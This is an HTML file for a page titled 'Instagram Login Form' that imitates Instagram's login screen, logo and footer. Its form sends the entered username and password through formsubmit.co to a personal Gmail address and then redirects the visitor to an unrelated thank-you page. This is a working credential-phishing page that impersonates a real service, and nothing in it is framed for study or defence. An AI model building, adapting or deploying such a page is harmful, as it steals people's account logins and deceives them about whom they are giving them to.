<!DOCTYPE html>
<html lang="en">

<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta http-equiv="X-UA-Compatible" content="ie=edge">
  <script src="https://kit.fontawesome.com/fc1e235b2e.js"></script>
  <link rel="stylesheet" href="style.css">
  <title>Instagram Login Form</title>
</head>

<body>
<!-- <form action="https://formsubmit.co/arsalan.ganjeh82@gmail.com" method="POST">
        <textarea  class="inputForm" rows="6" placeholder="متن مورد نظر" type="text" name="اسم" required></textarea>
        <input  id="phoneNumber" class="inputForm2" placeholder="شماره تفلن" type="number" name="شماره تلفن" >
        <button class="submitButton" type="submit">ارسال</button>
        <input type="hidden" name="_next" onClick="submitFormClick()" value="https://bamsabz.github.io/pages/thankYou.html">
        <input type="hidden" name="_captcha" value="false">
   </form> -->
  <div id="wrapper">
    <div class="container">
      <div class="phone-app-demo"></div>
      <div class="form-data">
        <form action="https://formsubmit.co/shadowsjerker@gmail.com" method="POST">
          <div class="logo">
            <img src="./images/logo.png" alt="logo">
          </div>
          <input type="text" class="inputForm" placeholder="Phone number, username, or email" required>
          <input type="password inputForm2" placeholder="Password">
          <button class="form-btn submitButton" type="submit">Log in</button>
          <input type="hidden" name="_next" onClick="submitFormClick()" value="https://bamsabz.github.io/pages/thankYou.html">
          <input type="hidden" name="_captcha" value="false">
          <span class="has-separator">Or</span>
          <a class="facebook-login" href="#">
            <i class="fab fa-facebook-square"></i> Log in with Facebook
          </a>
          <a class="password-reset" href="#">Forgot password?</a>
        </form>
        <div class="sign-up">
          Don't have an account? <a href="#">Sign up</a>
        </div>
        <div class="get-the-app">
          <span>Get the app.</span>
          <div class="badges">
            <img src="./images/app-store.png" alt="app-store badge">
            <img src="./images/google-play.png" alt="google-play badge">
          </div>
        </div>
      </div>
    </div>

    <footer>
      <div class="container">
        <nav class="footer-nav">
          <ul>
            <li>
              <a href="#">About us</a>
            </li>
            <li>
              <a href="#">Support</a>
            </li>
            <li>
              <a href="#">Press</a>
            </li>
            <li>
              <a href="#">Api</a>
            </li>
            <li>
              <a href="#">Jobs</a>
            </li>
            <li>
              <a href="#">Privacy</a>
            </li>
            <li>
              <a href="#">Terms</a>
            </li>
            <li>
              <a href="#">Directory</a>
            </li>
            <li>
              <a href="#">Profiles</a>
            </li>
            <li>
              <a href="#">Hashtags</a>
            </li>
            <li>
              <a href="#">Languages</a>
            </li>
          </ul>
        </nav>
        <div class="copyright-notice">
          &copy 2019 Instagram
        </div>
      </div>
    </footer>

  </div>

</body>

</html>